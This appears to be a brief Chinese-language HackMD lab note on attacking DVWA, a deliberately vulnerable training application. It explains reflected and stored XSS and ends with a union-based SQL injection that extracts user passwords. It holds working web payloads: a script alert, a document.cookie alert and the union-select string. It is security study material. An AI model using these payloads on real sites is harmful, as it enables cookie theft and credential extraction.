dvwa XSS - HackMD

# dvwa XSS ###### tags: xss ## Reflected Cross Site Scripting (XSS) ![](https://i.imgur.com/gal8A7i.png) - 在未過濾使用者輸入的情況下，攻擊者可輸入帶有執行程式碼之輸入文字 - 輸入後反射到瀏覽器執行 - 攻擊語法 ```=javascript <script>alert(1)</script> ``` - ![](https://i.imgur.com/7PrwMeJ.png) ## 儲存型XSS ( Stored ) ![](https://i.imgur.com/DsSM7jB.png) - 誘發在留言板等能儲存文字的地方，使用者的輸入會被儲存到伺服器端，等到下個受害者拜訪該頁面時，xss語法就會再度被執行處發 - ![](https://i.imgur.com/Dbog77D.png) - ![](https://i.imgur.com/adhFis4.png) - ![](https://i.imgur.com/MSA1NK1.png) ```-javascript <script>alert(document.cookie)</script> ``` ## SQL INJECTION SELECT First_Name,Surname WHERE ID='$ID'; - 查詢password ``` 1' and 1=2 union select user,password from users # ```